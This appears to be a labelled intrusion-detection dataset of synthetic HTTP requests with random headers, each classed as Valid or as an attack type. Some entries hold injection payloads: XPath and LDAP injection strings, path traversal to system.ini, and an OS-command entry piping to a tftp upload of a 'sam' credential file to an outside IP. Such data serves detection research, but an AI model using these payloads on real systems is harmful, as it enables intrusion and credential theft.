ETag: W/"5PV8Py1fLbmc@v.6Mq9o"
Expect: 0iewarwe=henfgnde
From: eeej3@loctMytno.org
If-Modified-Since: Sun, 15 Jul 07 08:14:50 CET
If-Unmodified-Since: Tue, 25 May 04 19:13:49 GMT
If-Match: "@_J9sFxIWZgD4ibDZB"
If-None-Match: "jf49Hz5u09jEzCQG.Wl"
If-Range: "_wEn7veqmMAAChttg"
Max-Forwards: 6493
MIME-Version: 2.6
Pragma: aveatfrr=kioehjm
Proxy-Authorization: Basic ZXNvbHRybzphRk9p
Authorization: Basic cmE3Yzp5YW9kbA==
Range: 130281-,-02625
Referer: /afsti/s8wra/etEdogn/mefd/j1te.nsf
TE: trailers
Trailer: From
User-Agent: Rz5e/7.4.5.9
UA-CPU: MIPS
UA-Disp: 702,413,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 367x7496
Via: HTTP/3.1 www.8ieaxi4.html
Transfer-Encoding: identity
Upgrade: 7esxrt/2.4, oead/7.0, rsiaa/4.4, rte8e/6.3
Warning: 412 www.tsiiSsfi.jpeg "s4hN" "Mon, 17 Nov 08 12:26:07 UTC"
X-Forwarded-For: 15.97.140.41
X-Serial-Number: 4047270
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32092
Start - Id: 3285
class: Valid
GET /eNiaakm7ingnDbXDE/aeagaphroniahrtBo/@krcpINV/enNnoethtra/d%u/execfT4M0d1P./eettttmne8yaE/@WuP/d00h7X/neinh/eUXQj.gif?aicit=e7io+ey&8A3AujDYJc=3&WPPb0arIFeHqnetcat=3&ySfromVANJxL=h%40cmdreplaceso&oH2YlQcmdv=bQjZ0a-- HTTP/1.0
Host: www.Oeilhllci.de:80
Connection: close
Accept: image/*, audio/x-wav;q=0.1, application/*
Accept-Charset: windows-1250, iso-8859-9;q=0.2, x-mac-arabic, windows-1254;q=0.2, x-mac-hebrew;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: puc=dr
Client-ip: 107.185.188.2
Cookie: 8niNnroetrec=74574048;pldihjboecmAd1p=lchildyre;metakSJ0xh=ehrkaho;2sbaew=cSn8lrMIncTe0lw;qf=1Kf;6d6ksetiag=ree4smtuSegrOea
Cookie2: $Version="12"
Date: Sun, 24 Oct 04 22:40:57 UTC
ETag: "eDsrSWQ68q3m7OXcvWT"
Expect: 100-continue
From: ynnst@syowo.org
If-Modified-Since: Fri, 19 Feb 10 23:08:55 GMT
If-Unmodified-Since: Sun, 05 Aug 07 08:27:56 UTC
If-Match: *
If-None-Match: *
If-Range: "evAi5896eEsuVgSPkIM"
Max-Forwards: 9403
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: Basic dGVhWWFpZWE6ZW94MHQ=
Authorization: Digest response="BEE9BB5cEb9EE829ca67C550Cc1cF6a1"
Range: 0134-966096
Referer: http://www.kjtstt.fr/oflh/eytoseL.dll
TE: deflate;q=0.2
Trailer: From
User-Agent: Mozilla/9.4 (Windows; U; WinNT 3.2; Se-3i; rv:1.0.9) Gecko/76773009
UA-CPU: PowerPC
UA-Disp: 032,9401,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 179x3842
Via: HTTP/9.8 www.trtNmut.html, HTTP/4.2 203.191.220.95, HTTP/0.4 www.smLae5o.htm
Transfer-Encoding: oaOo; iekr=a5cags
Upgrade: bmdsep/9.4
Warning: 329 www.ims0.jpeg "mtefiw4rama7sn" 
X-Forwarded-For: 252.218.6.87
X-Serial-Number: 697185
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3285
Start - Id: 6846
class: Valid
POST /7oEefiarnieeHih.sh? HTTP/1.0
Content-Length: 217
Content-Language: Lefm
Content-Encoding: gzip
Content-Location: http://akTnsS.gov/sasusnud/4oeizyjj/8Yase/tcDee4/bOsg.tar.gz
Content-MD5: YW95RWhlb2V0bzA0b213ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 01 Jan 07 12:37:37 UTC
Last-Modified: Thu, 14 Oct 04 20:37:17 UTC
Host: 60.237.36.95:80
Connection: keep-alive
Accept: application/postscript;q=0.2, image/gif;q=0.9
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 26.175.54.181
Cookie: 1whereQiw=H;eer=06471561;genhnoi=coTwNpsl;mrn7C8naqae=4ye;atAhsqchALR=st2a$t inrctj
Cookie2: $Version="628"
Date: Sun, 06 Mar 05 12:20:10 CET
ETag: W/"9lIKZJcyuwauGYBo_95"
Expect: yOvyaad7=sere
From: dbae4ti@tmraxarsak.gov
If-Modified-Since: Wed, 08 Jul 09 13:58:20 GMT
If-Unmodified-Since: Mon, 29 Dec 08 23:58:11 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 12 Dec 04 01:47:32 GMT
Max-Forwards: 334
MIME-Version: 7.3
Pragma: w='8riiba'
Proxy-Authorization: Basic dG9hZm9vcm46aW9yRWJwdXk=
Authorization: NTLM dW50dUd1R2lwb2Flb3M5ZUhha3B1aWEyZGVmdW1icm4=
Range: 708-,54-
Referer: /yaheit/fAcgyon6.php3
TE: trailers,chunked
Trailer: Range
User-Agent: Mozilla/8.4 (Windows; U; Win 9x 8.0; at-or; rv:8.2.6) Gecko/69801251
UA-CPU: 68000
UA-Disp: 0985,7140,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 302x0187
Via: HTTP/3.7 110.252.40.147, 4.6 165.98.214.129, 8.7 122.143.180.111
Transfer-Encoding: gzip
Upgrade: vryi/9.6, tRU/6.9
Warning: 129 www.9lvodtr.jpeg "nTtwlNvsm" "Wed, 13 Dec 06 13:48:45 UTC"
X-Forwarded-For: 225.78.188.108
X-Serial-Number: 99955754
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

eUerprtAq3=rldxphpylsbr&shelpekOnat6ysc=aaN&EyagwHm=wz8elet|Sa>8eobjectoim&7lyY1RYbchildrtQ=109662671&xterme7hn76o-O7=gdaeqi&aA=asshDiozhbejtvn&oeuocfh8noI=ElAopena&KhtpassMmailconnect5@=9N4cEpnUt&BW1QO6Gv=0539422

End - Id: 6846
Start - Id: 49542
class: XPathInjection
GET /a2eyOlCJateisas0hsse/pFep3iesrteytttesht/9wqrweSmp65/46M9/nD1SnKNqsSm6/horebNateteRaudmt/Rsame/0cat.jsp?2mFzvxp_access_logDkE=orowpo&ai57emffeaaatr=1e1l&Pd080lwC=0wGJ&hrhouleuhe=aOmele&dii=eoc%27++++or+++++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D++or+++++%27Bafytous%27+%3D%27&5ro0=9&3TH2=2O2&dmeioia4mm=oaydN&wTokjyltrI0c=O9lndiaun&td=171&O09u8Qapobjectand=3991 HTTP/1.1
Host: www.tlrqH.cz
Connection: keep-alive
Accept: image/*;q=0.8, video/*
Accept-Charset: iso-8859-1;q=0.3
Accept-Encoding: *;q=0.9
Accept-Language: yigU-P, qao-oen;q=0.7, y-iBta;q=0.0, tsppc-pes4mi
Cache-Control: no-store
Client-ip: 74.98.44.206
Cookie: OPrE0Gp7uETf=mhlnktr8wutldeldoy;unurue=7417;i2E9titli7if7=adshome;eLie2Qx=>
Cookie2: $Version="293"
Date: Tue, 15 Nov 05 07:49:55 CET
ETag: "hPBcArlZn-GHmcco"
Expect: cieUaqbi
From: wirtsy@nexe4eht.ch
If-Modified-Since: Wed, 12 Apr 06 06:02:55 UTC
If-Unmodified-Since: Sat, 27 Jan 07 22:18:07 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 08 Mar 06 07:57:31 UTC
Max-Forwards: 0
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: NTLM cm1Cbm5naWx0Y2FzcEdob3RyYTJrbDBlOW5udWNlZXJiY29ibnN1c2FzeW9hemM=
Range: 7-1,-171
Referer: /m2eRt/tsteez0e.exe
TE: gzip,deflate,chunked;q=0.8
Trailer: Accept-Charset
User-Agent: Mozilla/0.9 (compatible; MSIE 9.6; Win 9x; yttaes)
UA-CPU: Sparc
UA-Disp: 2924,8513,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 4014x885
Via: 7.9 76.50.16.167
Transfer-Encoding: identity
Upgrade: os2eA/3.8, zes2/5.7, z6sc/6.6, jntir/3.8
Warning: 066 177.133.141.195 "uvomreyngrucmsS" "Mon, 08 Mar 10 06:12:12 GMT"
X-Forwarded-For: 17.226.135.24
X-Serial-Number: 84222466016930
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49542
Start - Id: 22240
class: Valid
GET /orninooe0het/ir/shua/htacceslJoptpxp_0/rxwin_k/uddnn9vi9ipac/ohlzrdlb/rrTfe/egeWtDOv0Rso.swf?Deam51bh5emj2AS=868492&iyhoyroan=79180&Sperl9updateAexec6kw=aEEEM5&tybd=idwhereeea&rjwrtUrsrcdt=6392229533&srT8rucslEu=raf&Xtmpvw=toaenvecntai+&IwgetlibAy=985919&rmosaor=0%40odtystsFhR%3A&aie3chhrf=+o+bodyH&bgekciiige=e1aMwD1x&fClhou=74 HTTP/1.0
Host: 35.192.155.66
Connection: tab2
Accept: application/zip;q=0.7, video/mpeg;q=0.9, video/*;q=0.6
Accept-Charset: shift_jis, euc-kr;q=0.0
Accept-Encoding: *
Accept-Language: h-a6Ijwaze;q=0.2, ktmclni-vi;q=0.9, oauitsr-iqeNlon, nE-jar
Cache-Control: max-stale
Client-ip: 27.61.205.86
Cookie: iN8reeot=651;eoernbyaep=6678;EsnlbbwhhoknE=19;owsou=ZD9etAefeRclv
Cookie2: $Version="51"
Date: Fri, 20 Aug 04 13:25:44 UTC
ETag: "pC1Cj_Ojl0F3q2IAX"
Expect: ljhEdvL
From: orEtts@ismhaeter.de
If-Modified-Since: Mon, 27 Mar 06 07:17:03 UTC
If-Unmodified-Since: Thu, 30 Sep 04 06:21:52 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 302
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: Digest opaque="rt6d9c"
Authorization: Basic TmloYTp3bjFISWE=
Range: -09
Referer: http://www.cO0nEpne.cz/nsawil.zip
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/1.4 (Windows; U; Windows NT 3.5; m9-jr; rv:0.4.1) Gecko/88737475
UA-CPU: Sparc
UA-Disp: 204,827,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 1581x2081
Via: FTP/6.7 52.60.3.99:7423, 3.1 www.sei65es.htm, 8.8 234.39.13.31
Transfer-Encoding: compress
Upgrade: llxrnU/8.5, 9sez/6.3, 5o9gtz/1.6, sio/7.4, ahOwn/2.8
Warning: 873 www.Hd4hrn.jpeg "edecnpese4ovlNt57e" 
X-Forwarded-For: 94.18.15.215
X-Serial-Number: 35178476793
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22240
Start - Id: 11830
class: Valid
GET /-N8VE.ftpl/pdofon3nees8atHmru8s/opgntt7/31vls14eg/tye5eaA963itnIsewyn/y_s/e1-uYxqWBoLFkAT/ffufm0epihnod/gtiBa5igMsubehs2hl/sC31skrWZpWmO/aEJpM/HKM-5body42Ujs.aspx? HTTP/1.0
Host: 184.227.178.39:23067
Connection: close
Accept: image/gif
Accept-Charset: x-mac-roman, iso-8859-3, ks_c_5601-1987, shift_jis;q=0.0, euc-cn
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=05
Client-ip: 250.119.225.222
Cookie: erBrsoeligttbo=ne;childqLAjLWvarNcopyhaving=m9seet;mmfmlske=psens;Bsnyf=oEa~Tt40+de c;fuzk2J=a;tvyree=>s
Cookie2: $Version="845"
Date: Thu, 28 Jun 07 01:53:43 UTC
ETag: "hP5TcJChMEOZ4s4KgW"
Expect: 100-continue
From: raeRsdn@ezgoodi.biz
If-Modified-Since: Tue, 10 Feb 04 17:07:53 GMT
If-Unmodified-Since: Mon, 08 Aug 05 22:38:13 GMT
If-Match: "4Shs6e4Rf2kmm1l"
If-None-Match: *
If-Range: *
Max-Forwards: 9
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: NTLM cndlYVQ0cmVvbnZyZWxyaW50dHRhaXJ0dGx2bnNhb21iaQ==
Authorization: Digest nc=f8da8099
Range: -9087,256-
Referer: http://www.jhb4est.uk/iE5snjne/Auueinmi/ryTad/acanzUed.tiff
TE: trailers,trailers
Trailer: Accept-Charset
User-Agent: tuat0ama (rtxLDyTD; sx0A1KVP)
UA-CPU: PowerPC
UA-Disp: 032,592,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 045x0190
Via: 1.4 www.sgpv.css, 4.7 www.ia4rLot.js
Transfer-Encoding: gzip
Upgrade: ptl/3.8, ewttf/4.6, ywn/8.3
Warning: 779 www.runsnon.css "al5s6npNr3oe0Heo" "Sun, 08 Mar 09 02:18:33 CET"
X-Forwarded-For: 154.0.65.175
X-Serial-Number: 63208652767395
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 11830
Start - Id: 45185
class: PathTransversal
GET /../../? HTTP/1.0
Host: 39.51.122.219
Connection: close
Accept: audio/x-wav
Accept-Charset: windows-1255, iso-8859-3;q=0.5, windows-874;q=0.4, gb2312
Accept-Encoding: identity
Accept-Language: *
Cache-Control: no-cache
Client-ip: 29.232.237.153
Cookie: teO7mIltat46s=a1pt;wo4=8356503535;Rf1lacceptexecgG=uP6VkU7iZWW;rtEv2law=http=O nr0Qadmintof;cHfcmhspX5=o1duneaitaglc4
Cookie2: $Version="339"
Date: Sun, 29 Jun 08 12:07:18 UTC
ETag: W/"Om2MM2xg9YxaUgf@.A"
Expect: 100-continue
From: azaxo6@aowhloiie.net
If-Modified-Since: Sat, 15 Jan 05 18:53:28 GMT
If-Unmodified-Since: Sat, 10 Sep 05 11:25:42 UTC
If-Match: "xgznTSO9INjdkIy1E"
If-None-Match: *
If-Range: Fri, 16 Jul 04 05:10:34 UTC
Max-Forwards: 747
MIME-Version: 7.0
Pragma: eeb=iNttnn
Proxy-Authorization: Digest uri=/teoadOp/uies/ebnnhteb/ariuiir/caepcrnU.pdf
Authorization: Digest algorithm=MD5
Range: 551-3881,-846
Referer: http://0hktet.biz/iaeryllo/6tO7esat/7shpe/buonnsNo.tar
TE: deflate;q=0.4
Trailer: Authorization
User-Agent: grtr/0.0.8.4
UA-CPU: StrongARM
UA-Disp: 370,8487,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 1177x8327
Via: HTTP/9.8 186.248.208.45, FTP/8.2 www.ulleefa.html, 7.0 168.238.64.146:97
Transfer-Encoding: compress
Upgrade: eimdea/6.6
Warning: 826 www.ta4rtlrX.css "e3eAsf" 
X-Forwarded-For: 254.171.174.88
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45185
Start - Id: 44564
class: OsCommanding
PUT /3.lr58d0window.open0d.tiff? HTTP/1.0
Content-Length: 241
Content-Language: soad
Content-Encoding: compress
Content-Location: http://www.ii19.it/taoeaEes/eOey.wmn
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 26 Sep 09 16:27:59 UTC
Host: 122.107.160.50
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: gzip, identity;q=0.1, deflate
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 10.34.240.53
Date: Sun, 11 Sep 05 16:39:22 CET
Expect: uwsaltSm=5myteE;eo7otdz=thwSy7x0
If-Modified-Since: Sat, 20 Aug 05 19:50:16 UTC
If-Unmodified-Since: Wed, 06 May 09 12:33:04 GMT
If-Match: *
If-None-Match: *
Max-Forwards: 0
Pragma: no-cache
Authorization: Digest username="lTri"
Referer: http://www.HnYfmlca.cz/rnstOn.dll
User-Agent: Mozilla/5.2 (Machintosh; U; PPC Mac OS X 9.0; os-id; rv:8.6.0) Gecko/65584115

3aeiT=aneetAsfdes3s&3eoe=oacndn&otsdebeF8BTe=6814358509&sP9ciEsimeeaee=tasTadnaa&rospohag=endacdijjswrnscs5&ucRihoiNl=218.40.199.243   |tftp -i     134.47.9.42   PUT sam._&henoN3Hdyvyk2dg=138513&ThMahtSoOr=hfp7FdWqGH@&ltzigmN=Gy8setendlT

End - Id: 44564
Start - Id: 45525
class: PathTransversal
GET /-p9iBaKIzws/7xep4o/J@/hn09e/sws0rIwismiigcs8rSo/caHu8sumcdirObtxh9kN.jpeg?foBtezw=83389&osogaa=%5CWINNT%5Csystem.ini&neae=010684816&xUJQ5RzFAP=ginsert4gl6xeesRebto%25%7C&teymr=owhsah9g7e&4iselect7OTchomexK@=881&yrn1iosnri=792798&iaeaeoht6hdSbaT=a5ame HTTP/1.1
Host: 214.108.150.9:0
Connection: tseshi
Accept: text/*
Accept-Charset: ks_c_5601-1987, x-mac-chinesetrad;q=0.2
Accept-Encoding: identity;q=0.5, identity;q=0.7, deflate
Accept-Language: sqdp9ai3-eZ2a, re-r1Et;q=0.8, aqU3rsve-s
Cache-Control: no-store
Client-ip: 228.114.110.173
Cookie: aeutest=omVT2;zsll=ilfBe;as8GaOulntashe=IB uc
Cookie2: $Version="678"
Date: Wed, 24 Dec 08 07:30:48 CET
ETag: W/"JCTn_ojKBCwZqY_Co"
Expect: 100-continue
From: iofh@bmeUEpaiu.ch
If-Modified-Since: Mon, 12 Sep 05 23:21:41 UTC
If-Unmodified-Since: Sat, 29 Dec 07 23:04:24 UTC
If-Match: "syL4kzaXZD_fnT1kPl5F"
If-None-Match: "2xpFUXM0tsl_AHRt9t"
If-Range: "3n3uC.-P2wspN5e.7"
Max-Forwards: 43
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: NTLM cFNyaGxyRWVobWlpbm9pcWlyY3VvYWVMamg4cmVJZFNlbkJsb2l0d3JlcjR6ZW0=
Range: 55569-482846
Referer: /rxse/isr95sr.js
TE: trailers,trailers,trailers
Trailer: Accept
User-Agent: Mozilla/6.9 (Windows; U; Win98 8.2; fe-Ec; rv:8.5.3) Gecko/15077230
UA-CPU: 68000
UA-Disp: 3482,2872,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 441x867
Via: 9.5 239.83.237.158, 8.0 www.mYLq.png:21, 0.1 www.atNsadle.js
Transfer-Encoding: compress
Upgrade: heT/9.6, 8laosw/2.4, Bscemo/9.3, fdhtol/5.6, ecoy/9.4
Warning: 291 197.115.20.32 "ofotvtereustbtDpofo" 
X-Forwarded-For: 55.26.191.205
X-Serial-Number: 2215888867609
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45525
Start - Id: 22794
class: Valid
GET /fyicQF4op_5FR.X/intihril/NQ8blaBygtNvsKZ/@5zWN/spow5bjgs/c8WnvewXGCSTGY2QB/a.7dYGz.js?df9a=toyJ8DBWgy&mqseoig=6584&hdlci5=99381&ntoarczuihlel=zGcootvlzeALaJ&o4r0sl0=90&flfp7otoltoa=56501&hNe7ihrzn0srg=56&u4tdqisao7=%7Eud8slube&27jusr5BC0=608 HTTP/1.1
Host: www.n0Tdan1su.cz
Connection: n4sepa
Accept: video/mpeg, text/html;q=0.5, application/rtf
Accept-Charset: iso-8859-6, x-mac-turkish;q=0.5, windows-1257;q=0.3, iso-8859-1, iso-8859-15
Accept-Encoding: *
Accept-Language: qas9et03-0;q=0.1
Cache-Control: no-cache
Client-ip: 227.73.123.190
Cookie: eigrrTg=tnnfhCpoechmth;rAnoEeztbtm=1clH;ehnuu=yelikeacceptN;b9rGCfBfromxRcc=processing-instruction8echo
Cookie2: $Version="225"
Date: Sun, 18 Dec 05 10:02:55 UTC
ETag: W/"eKu6h5Nl2CjgMZnjC32"
Expect: be8oiah=xhpkwe
From: Ar5ho@jaaeat.fr
If-Modified-Since: Sun, 27 Jul 08 13:15:48 CET
If-Unmodified-Since: Tue, 01 Dec 09 13:41:46 UTC
If-Match: *
If-None-Match: "GXK3l3DpB0o.aWGX31N"
If-Range: "@tufVRRaapu61oekEoAp"
Max-Forwards: 5
MIME-Version: 0.5
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM cGxybm50bnRjdmg3aWVlb2V0b3RsTG5kc1NybmUwYUxu
Range: -637
Referer: http://cefva.it/nntH/tladsio.nsf
TE: trailers,gzip;q=0.9,trailers
Trailer: Proxy-Authorization
User-Agent: imnF7oiihnFnAgmgsell
UA-CPU: 68000
UA-Disp: 9973,4219,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 396x8159
Via: FTP/9.1 www.setuaat.shtml, l8e/8.7 205.56.245.27, 4.7 249.252.225.45
Transfer-Encoding: deflate
Upgrade: zuf/1.3, ons/6.0, ctn/4.8
Warning: 885 www.tedi.jpeg "soelhnre6erIg2cgg6" 
X-Forwarded-For: 147.118.27.36
X-Serial-Number: 058187169230158
----: -----------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 22794
Start - Id: 15710
class: Valid
GET /9afeastserlyinboPyon/rtZabttmea8ch6ttca/tigss4i/nlrslt/cP7G9fv/sk3c42oDLhj-a-ZRa_./nbkeidg/t6UU/e2a.jpeg? HTTP/1.1
Host: www.tAawsnqatt.com:85
Connection: oIceiioa
Accept: */*;q=0.5
Accept-Charset: iso-8859-8;q=0.8, windows-1257, windows-1258
Accept-Encoding: deflate;q=0.3, identity, identity
Accept-Language: azen-ng2sedh;q=0.9, wciaog-Rl;q=0.8, grisept-r1, Dd4od-D3oatu8, fecz5-y;q=0.5
Cache-Control: eIiaem=eeri6a
Client-ip: 31.20.143.241
Cookie: mgqd6yih= qk6whereu;tbtPjheZp3=scriptz4aemochag7epSEsystemEe
Cookie2: $Version="216"
Date: Wed, 04 Nov 09 07:18:39 CET
ETag: "4HKQSqX5rLHIfLrMjJ"
Expect: adapRas=stI4
From: jBhna@eoo43leE.com
If-Modified-Since: Wed, 28 May 08 10:50:27 GMT
If-Unmodified-Since: Sun, 17 Oct 04 06:23:15 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 12 Jan 05 23:18:16 CET
Max-Forwards: 12
MIME-Version: 7.6
Pragma: i=5av
Proxy-Authorization: NTLM TndhbXRyemVrdG91ZWxlczlhZUFjdGFucm5ldHRvZXpJc2Rob3ZjaDJsaWNzemk0
Authorization: fupM ahigrje=sdnac
Range: 2-,-372
Referer: /ly9aNde/5deE/nub6pao/mlagai/io2aeeng.wmn
TE: chunked;q=0.1
Trailer: TE
User-Agent: tbP1sXxGVJ http://www.soADSo.de
UA-CPU: MIPS
UA-Disp: 9331,266,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 8122x873
Via: FTP/9.1 66.66.149.73, 3.9 www.fetah.js
Transfer-Encoding: deflate
Upgrade: sli/9.1, Dh6/9.5, rWe/7.7, euhI/9.9
Warning: 932 www.rnd3y6t.html "sooEn8itisTrOtziidm" 
X-Forwarded-For: 139.13.197.94
X-Serial-Number: 555023929683
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15710
Start - Id: 30463
class: Valid
GET /ylshrnrEorsruf0uomyr/ae6btulieaitwaq/mD2QClBIpiwwf.png? HTTP/1.0
Host: www.sId1cegd.net
Connection: tshi3om
Accept: image/*;q=0.0, application/rtf;q=0.2, text/html
Accept-Charset: euc-kr, hz-gb-2312;q=0.4, iso-8859-1;q=0.9, x-mac-chinesesimp;q=0.4, x-mac-chinesetrad
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: no-cache
Client-ip: 250.163.226.249
Cookie: sVkHjlike=hasuehiugsn;eeb=ml;adrqhiucuhsc=5;lsheMh3oFnA=nf;Fcopy6BCKnZ-qupdate=t3Gy@ZTn8UbM;o500dcYk8=heryuosthT4fe
Cookie2: $Version="6"
Date: Tue, 04 Jan 05 11:07:51 GMT
ETag: "Kc8eIF.D6XHob.jUc"
Expect: 100-continue
From: TretetMl@zoaae.de
If-Modified-Since: Tue, 28 Jul 09 15:29:15 GMT
If-Unmodified-Since: Tue, 19 Aug 08 14:25:30 UTC
If-Match: ".XLFIn_1svuO3HZco"
If-None-Match: *
If-Range: Mon, 02 Mar 09 22:44:40 CET
Max-Forwards: 2704
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest realm
Range: -3,60-
Referer: /lhgae/7safsn3/calirOnu/xigs5n/hiJeftnO.avi
TE: gzip,deflate,trailers
Trailer: Cache-Control
User-Agent: Mozilla/1.4 (Windows; U; Windows NT 3.2; yr-Aa; rv:4.4.8) Gecko/55635979
UA-CPU: x86
UA-Disp: 2897,898,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 710x3564
Via: 0.3 245.16.149.149, HTTP/5.8 83.38.255.35, HTTP/0.6 93.31.145.28
Transfer-Encoding: identity
Upgrade: dksM/4.0, egtr/5.6, at1f/2.7, Ruilnr/5.9, epf4h3/8.8
Warning: 372 6.28.172.137 "NiolntT" "Sat, 08 Mar 08 01:32:29 UTC"
X-Forwarded-For: 216.219.0.201
X-Serial-Number: 839589841918771
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30463
Start - Id: 34425
class: Valid
PUT /d0qU.UEik9_Fw_hq/lFoaO.EZL/eQaQG91cIESDMOvdojqk/eofiq3nrCS0ttu2/r0x1mt_RqveLd/oxKb2X7OEJY/EHAG/0khttpxp_r-_@W/i-HJAmeM.png? HTTP/1.0
Content-Length: 170
Content-Language: rmeut53b
Content-Encoding: deflate
Content-Location: http://www.onaf1.fr/fdiceaE/hcr6s/eo9iet/mtho.tiff
Content-MD5: b2l3dmJsaHRvaXRzc3huZA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 12 Feb 06 22:43:41 CET
Last-Modified: Wed, 26 Oct 05 10:29:15 CET
Host: 28.180.51.115
Connection: wsureith
Accept: text/*, image/gif
Accept-Charset: utf-7;q=0.7, x-mac-ce;q=0.3, iso-8859-2;q=0.2, windows-1253
Accept-Encoding: compress;q=0.9, compress, compress;q=0.3
Accept-Language: *
Cache-Control: no-cache
Client-ip: 84.198.178.247
Cookie: mnsltvi=c;one4al=OatgeIs0etome;oresEyilmdioll=8pmYB
Cookie2: $Version="5"
Date: Fri, 16 Jul 04 14:34:09 CET
ETag: W/"klRyVC@w2mtJQIc5LX"
Expect: dyig0i9=6sBoLdsl;yRsosfta=lSdeldl
From: uvzad@jaoeradkfe.uk
If-Modified-Since: Mon, 24 Nov 08 05:15:08 GMT
If-Unmodified-Since: Sun, 01 May 05 01:24:14 UTC
If-Match: "UQ@tDyAtc3ZSoxpJs"
If-None-Match: "HCfJ-mzZLTO0GIfIcr"
If-Range: Sun, 02 May 04 22:53:41 GMT
Max-Forwards: 624
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: if1e8w idii=psa0
Authorization: tondie Eazlxi=ueeytl2
Range: -2,-34,732-
Referer: http://Dmkdfef.com/eaeIk/5eM2nr.jpeg
TE: chunked;q=0.2,gzip;q=0.7,chunked;q=0.8
Trailer: Warning
User-Agent: Mozilla/0.9 (Windows; U; Windows NT 1.9; ot-Hn; rv:1.0.8) Gecko/17129349
UA-CPU: StrongARM
UA-Disp: 7247,384,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 840x4922
Via: berm/2.7 180.4.167.59, FTP/3.4 168.205.81.50
Transfer-Encoding: compress
Upgrade: nnygpo/3.3, eaI/0.2, rgsu/5.5, tsO/7.9, rdq/5.4
Warning: 076 www.tlWems.gif "aretamgt" 
X-Forwarded-For: 229.28.6.246
X-Serial-Number: 22221039836
----: -----------
~~~~~: ~~~~~~~~~~~~~~

r0zf9ui=)Sh @nullNnD+2tnio&poIehjqn=68251607&bgsoundBpwz0zRRROQ=tcdi&ye62xmeedu=3935&totrd=emjlpeaar&ro=501387&kht8HhIaoshg=4904&99Aia2sasBeSoA=3442&tridnnikas4B=ym

End - Id: 34425
Start - Id: 37320
class: LdapInjection
GET /flapcfn/vZ/efxd_mFS/dyBrj_0K3.XZ.mspx?noeee8oa=1357601493&dzc0evi7kcenmeb=e9YdcM0K&idiI4Ies6nhdhqu=49381&npc6=tu8agisrohmcbtadeg&gtNcoaou3n=yosbbua6iea8moxdl&rw8ieatb3se=a5Weul&ayqnccs7nFyiwi6=i7itot&lreips=rRQe HTTP/1.0
Host: www.eeme.gov
Connection: atU5
Accept: */*;q=0.1
Accept-Charset: utf-7, windows-1252;q=0.4, gb2312, iso-8859-2;q=0.1, euc-kr
Accept-Encoding: )(  |   (   cn=*o    'brien*)(mail =*o   'brien*   )  
Accept-Language: anneu)(&(objectClass =    Msh*)
Cache-Control: only-if-cached
Client-ip: 68.215.146.126
Cookie: bcd8tl=tuizGPU
Cookie2: $Version="95"
Date: Sat, 09 Feb 08 07:36:21 CET
ETag: "SqzTXG3cL_LrKvg7K"
Expect: 100-continue
From: rtec@se2cehaQn.com
If-Modified-Since: Mon, 08 Mar 04 08:01:04 GMT
If-Unmodified-Since: Wed, 30 Mar 05 10:25:29 UTC
If-Match: *
If-None-Match: "b5d.3QlkL0b1@pFN7GZ_"
If-Range: Fri, 26 Feb 10 13:48:16 CET
Max-Forwards: 8
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: NTLM aWgzbmF0aXNlZnNlcjlodG1hdGxtU3IycnRsZWFPTjdibms=
